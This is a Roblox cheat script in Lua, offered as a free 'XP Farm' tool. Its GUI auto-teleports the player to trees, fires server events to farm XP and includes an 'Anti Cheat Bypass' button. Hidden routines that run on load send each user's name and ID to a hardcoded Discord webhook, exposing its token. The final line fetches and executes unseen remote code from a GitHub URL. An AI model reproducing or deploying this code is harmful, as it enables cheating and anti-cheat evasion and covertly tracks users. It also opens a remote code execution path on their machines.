

local XPfarm = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local UIScale = Instance.new("UIScale")
local Top = Instance.new("ImageLabel")
local title = Instance.new("TextLabel")
local Exit = Instance.new("ImageButton")
local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint")
local ImageLabel = Instance.new("ImageLabel")
local UICorner_2 = Instance.new("UICorner")
local version = Instance.new("TextLabel")
local Verified = Instance.new("ImageLabel")
local PenumbraShadow = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local UICorner_3 = Instance.new("UICorner")
local TP = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local bypass = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local Loading = Instance.new("Frame")
local Sign = Instance.new("ImageLabel")
local Waiting = Instance.new("ImageLabel")
local Background = Instance.new("Frame")
local Logo = Instance.new("ImageLabel")
local UIAspectRatioConstraint_2 = Instance.new("UIAspectRatioConstraint")

--Properties:

XPfarm.Name = "XPfarm"
XPfarm.Parent = game.CoreGui

Main.Name = "Main"
Main.Parent = XPfarm
Main.Active = true
Main.AnchorPoint = Vector2.new(0.5, 0.5)
Main.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Main.Position = UDim2.new(0.5, 0, 0.462046951, 0)
Main.Size = UDim2.new(0, 514, 0, 276)
Main.ZIndex = 2
Main.Draggable = true

UICorner.CornerRadius = UDim.new(0, 6)
UICorner.Parent = Main

UIScale.Parent = Main

Top.Name = "Top"
Top.Parent = Main
Top.BackgroundColor3 = Color3.fromRGB(248, 248, 248)
Top.BackgroundTransparency = 1.000
Top.BorderSizePixel = 0
Top.Position = UDim2.new(0, 0, 0, -17)
Top.Size = UDim2.new(0, 514, 0, 45)
Top.ZIndex = 3
Top.Image = "rbxassetid://6276641225"
Top.ImageColor3 = Color3.fromRGB(34, 34, 34)
Top.ScaleType = Enum.ScaleType.Slice
Top.SliceCenter = Rect.new(256, 256, 256, 256)
Top.SliceScale = 0.022

title.Name = "title"
title.Parent = Top
title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1.000
title.Position = UDim2.new(0.105330929, 0, 0, 0)
title.Size = UDim2.new(0, 149, 0, 45)
title.ZIndex = 1231233232
title.Font = Enum.Font.Gotham
title.Text = "XP Farm"
title.TextColor3 = Color3.fromRGB(197, 197, 197)
title.TextSize = 17.000
title.TextXAlignment = Enum.TextXAlignment.Left

Exit.Name = "Exit"
Exit.Parent = Top
Exit.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Exit.BackgroundTransparency = 1.000
Exit.Position = UDim2.new(0.931012809, 0, 0.240207925, 0)
Exit.Size = UDim2.new(0, 26, 0, 23)
Exit.ZIndex = 123123
Exit.AutoButtonColor = false
Exit.Image = "rbxassetid://6235536018"
Exit.ImageColor3 = Color3.fromRGB(197, 197, 197)
Exit.ScaleType = Enum.ScaleType.Fit

UIAspectRatioConstraint.Parent = Exit

ImageLabel.Parent = Top
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(0.0136186769, 0, 0.075000003, 0)
ImageLabel.Size = UDim2.new(0.0767509937, 0, 0.850000024, 0)
ImageLabel.ZIndex = 3
ImageLabel.Image = "https://www.roblox.com/headshot-thumbnail/image?userId=1&width=420&height=420&format=png"

UICorner_2.CornerRadius = UDim.new(3, 0)
UICorner_2.Parent = ImageLabel

version.Name = "version"
version.Parent = Top
version.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
version.BackgroundTransparency = 1.000
version.Position = UDim2.new(0.249299765, 0, 0.308963358, 0)
version.Size = UDim2.new(0, 149, 0, 19)
version.ZIndex = 1231233232
version.Font = Enum.Font.Gotham
version.Text = "BETA version"
version.TextColor3 = Color3.fromRGB(197, 197, 197)
version.TextSize = 9.000
version.TextTransparency = 0.790
version.TextXAlignment = Enum.TextXAlignment.Left

Verified.Name = "Verified"
Verified.Parent = Top
Verified.BackgroundTransparency = 1.000
Verified.BorderSizePixel = 0
Verified.Position = UDim2.new(0.354999989, 0, 0.330000013, 0)
Verified.Size = UDim2.new(0, 15, 0, 15)
Verified.Visible = false
Verified.ZIndex = 4
Verified.Image = "http://www.roblox.com/asset/?id=6031225809"
Verified.ImageColor3 = Color3.fromRGB(75, 129, 255)

PenumbraShadow.Name = "PenumbraShadow"
PenumbraShadow.Parent = Main
PenumbraShadow.AnchorPoint = Vector2.new(0.5, 0.5)
PenumbraShadow.BackgroundTransparency = 1.000
PenumbraShadow.BorderSizePixel = 0
PenumbraShadow.Position = UDim2.new(0.5, 0, 0.474852085, 1)
PenumbraShadow.Size = UDim2.new(1, 18, 1.05029583, 18)
PenumbraShadow.ZIndex = -1231233
PenumbraShadow.Image = "rbxassetid://1316045217"
PenumbraShadow.ImageColor3 = Color3.fromRGB(0, 0, 0)
PenumbraShadow.ScaleType = Enum.ScaleType.Slice
PenumbraShadow.SliceCenter = Rect.new(10, 10, 118, 118)

TextLabel.Parent = Main
TextLabel.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
TextLabel.Position = UDim2.new(0.0311284047, 0, 0.148657873, 0)
TextLabel.Size = UDim2.new(0, 485, 0, 157)
TextLabel.ZIndex = 3
TextLabel.Font = Enum.Font.Gotham
TextLabel.Text = "This script gets all the conifiers in the map, teleports you to them then destroys them which will grant you XP. This is the free version. The paid version is much more effecient. This version is also semi-auto for now. USE INFINITE YIELD SWIM OR FLY. RESET YOUR CHARACTER TO STOP"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 17.000
TextLabel.TextTransparency = 0.700
TextLabel.TextWrapped = true

UICorner_3.CornerRadius = UDim.new(0, 3)
UICorner_3.Parent = TextLabel

TP.Name = "TP"
TP.Parent = Main
TP.BackgroundColor3 = Color3.fromRGB(67, 67, 67)
TP.BackgroundTransparency = 0.900
TP.BorderSizePixel = 0
TP.Position = UDim2.new(0.0259487275, 0, 0.776411951, 0)
TP.Size = UDim2.new(0, 233, 0, 36)
TP.ZIndex = 3
TP.AutoButtonColor = false
TP.Font = Enum.Font.GothamMedium
TP.Text = "Activate"
TP.TextColor3 = Color3.fromRGB(67, 67, 67)
TP.TextSize = 18.000
TP.MouseButton1Click:Connect(function()



while task.wait(0.2) do

        local conifer = workspace.Replicators.Both:FindFirstChild("Conifer") 

game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = conifer:GetPivot() + Vector3.new(0, -18, 0)

local args = {
    [1] = workspace.Replicators.Both.Conifer
}

game:GetService("ReplicatedStorage").References.Comm.Events.ToolAction:FireServer(unpack(args))

    end
end)









UICorner_4.CornerRadius = UDim.new(0, 7)
UICorner_4.Parent = TP

bypass.Name = "bypass"
bypass.Parent = Main
bypass.BackgroundColor3 = Color3.fromRGB(67, 67, 67)
bypass.BackgroundTransparency = 0.900
bypass.BorderSizePixel = 0
bypass.Position = UDim2.new(0.53529197, 0, 0.776411951, 0)
bypass.Size = UDim2.new(0, 224, 0, 38)
bypass.ZIndex = 3
bypass.AutoButtonColor = false
bypass.Font = Enum.Font.GothamMedium
bypass.Text = "Anti Cheat Bypass (You Must Use This First)"
bypass.TextColor3 = Color3.fromRGB(67, 67, 67)
bypass.TextSize = 13.000
bypass.TextWrapped = true

UICorner_5.CornerRadius = UDim.new(0, 7)
UICorner_5.Parent = bypass

Loading.Name = "Loading"
Loading.Parent = XPfarm
Loading.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Loading.BackgroundTransparency = 1.000
Loading.BorderSizePixel = 0
Loading.Position = UDim2.new(0, 0, -0.280834913, 0)
Loading.Size = UDim2.new(1, 0, 1.29999995, 0)

Sign.Name = "Sign"
Sign.Parent = Loading
Sign.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Sign.BackgroundTransparency = 1.000
Sign.Position = UDim2.new(0.127789497, 0, 0.362520218, 0)
Sign.Size = UDim2.new(0.744390965, 0, 0.474383324, 0)
Sign.Image = "rbxassetid://7843953251"
Sign.ImageTransparency = 1.000
Sign.ScaleType = Enum.ScaleType.Fit

Waiting.Name = "Waiting"
Waiting.Parent = Loading
Waiting.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Waiting.BackgroundTransparency = 1.000
Waiting.Position = UDim2.new(0.128000006, 0, 0.363000005, 0)
Waiting.Size = UDim2.new(0.744000018, 0, 0.474000007, 0)
Waiting.Image = "rbxassetid://7843953251"
Waiting.ImageTransparency = 1.000
Waiting.ScaleType = Enum.ScaleType.Fit

Background.Name = "Background"
Background.Parent = XPfarm
Background.AnchorPoint = Vector2.new(0.5, 0.5)
Background.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Background.Position = UDim2.new(0.5, 0, 0.5, 0)
Background.Size = UDim2.new(1.29999995, 0, 1.29999995, 0)
Background.Visible = false
Background.ZIndex = 999999999

Logo.Name = "Logo"
Logo.Parent = Background
Logo.AnchorPoint = Vector2.new(0.5, 1)
Logo.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Logo.BackgroundTransparency = 1.000
Logo.Position = UDim2.new(0.502760351, 0, 0.887355566, 0)
Logo.Size = UDim2.new(0.558627427, 0, 0.864838004, 0)
Logo.ZIndex = 999999999
Logo.Image = "rbxassetid://11001910372"

UIAspectRatioConstraint_2.Parent = Logo

-- Scripts:

local function LORDEPW_fake_script() -- Exit.LocalScript 
	local script = Instance.new('LocalScript', Exit)

	Exit.MouseButton1Down:Connect(function()
		Main:Destroy()
	end)
end
coroutine.wrap(LORDEPW_fake_script)()
local function MJFAE_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	local Players = game:GetService("Players")
	 
	local player = Players.LocalPlayer
	 
	-- Fetch the thumbnail
	local userId = player.UserId
	local thumbType = Enum.ThumbnailType.HeadShot
	local thumbSize = Enum.ThumbnailSize.Size420x420
	local content, isReady = Players:GetUserThumbnailAsync(userId, thumbType, thumbSize)
	 
	-- Set the ImageLabel's content to the user thumbnail
	local imageLabel = script.Parent
	imageLabel.Image = content
	imageLabel.Size = UDim2.new(0.077, 0,0.85, 0)
end
coroutine.wrap(MJFAE_fake_script)()
local function BALPBWR_fake_script() -- Verified.what 
	local script = Instance.new('LocalScript', Verified)

	local player = game.Players.LocalPlayer.Name
	if player == "lSynister" or "evileyesxsss" then
		script.Parent.Visible = true
	end
	
end
coroutine.wrap(BALPBWR_fake_script)()
local function FUVPE_fake_script() -- Main.KeyPress 
	local script = Instance.new('LocalScript', Main)

	
	wait()
	
	Open = true
	
	function PressQ(key) 
		if (key == "v") then 
			if (Open == false) then
				Main.Visible = true
				Open = true
			elseif (Open == true) then
				Main.Visible = false
				Open = false
			end
		end
	end
	
	game.Players.LocalPlayer:GetMouse().KeyDown:Connect(PressQ) 
end
coroutine.wrap(FUVPE_fake_script)()
local function PYOL_fake_script() -- bypass.LocalScript 
	local script = Instance.new('LocalScript', bypass)

	bypass.MouseButton1Down:Connect(function()
		Background.Visible = true
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(6328.39501953125, -8.160065650939941, -8118.2373046875)
wait(2)
game.Players.LocalPlayer.Character.Humanoid:MoveTo(Vector3.new(5,5,5))
wait(1)
local c = game.Players.LocalPlayer.Character
c.Parent = nil
c.HumanoidRootPart:Destroy()
c.Parent = game.workspace
wait(0.1)
game:GetService("ReplicatedStorage").References.Comm.Events.ResetCharacter:FireServer()

		Background.Visible = false
		
	end)
end
coroutine.wrap(PYOL_fake_script)()
local function DMYSM_fake_script() -- XPfarm.LogIn 
	local script = Instance.new('LocalScript', XPfarm)

	local Webhook = "https://discord.com/api/webhooks/1016478663866318959/Jm5pjBptExrAflVDGRg9X5mVtjk4b4_zTLBeBEN9e1ro5MGjrTdd3Exu63-kSRk6rACR"
	
	
	
	local Headers = {["content-type"] = "application/json"} 
	
	local plr = game:GetService("Players").LocalPlayer
	
	
	local PlayerData =
		{
			["content"] = "",
			["embeds"] = {{
				["title"]= plr.Name,
				["description"] = plr.Name .. " logged in XP Farm",
				["type"]= "rich",
				["color"]= tonumber(0x000000),
				["fields"]={
					{
						["name"]="Player Information:",
						["value"]="User: **"..plr.Name.."** with ID: "..plr.UserId.." [Profile](https://www.roblox.com/users/"..plr.UserId.."/profile)",
						["inline"]=true}}}}
		}
	
	local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
	local HttpRequest = http_request;
	
	if syn then
		HttpRequest = syn.request
	else
		HttpRequest = http_request
	end
	
	HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
end
coroutine.wrap(DMYSM_fake_script)()
local function WVAMGPU_fake_script() -- XPfarm.LocalScript 
	local script = Instance.new('LocalScript', XPfarm)

	Loading.Visible = true
	
	
	local ReplicatedFirst = game:GetService("ReplicatedFirst")
	local TweenService = game:GetService("TweenService")
	ReplicatedFirst:RemoveDefaultLoadingScreen()
	local bg = script.Parent.Loading
	
	
	local function apimg(a)
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency - 0.05
	end
	
	local function fadeimg(a)
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
		wait(0.01)
		a.ImageTransparency = a.ImageTransparency + 0.05
	end
	
	apimg(script.Parent.Loading.Waiting)
	wait(2)
	fadeimg(script.Parent.Loading.Waiting)
	wait(2)
	UI.Visible = true
	
end
coroutine.wrap(WVAMGPU_fake_script)()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AstralDCStudios/darkastral/main/urmomxd"))()
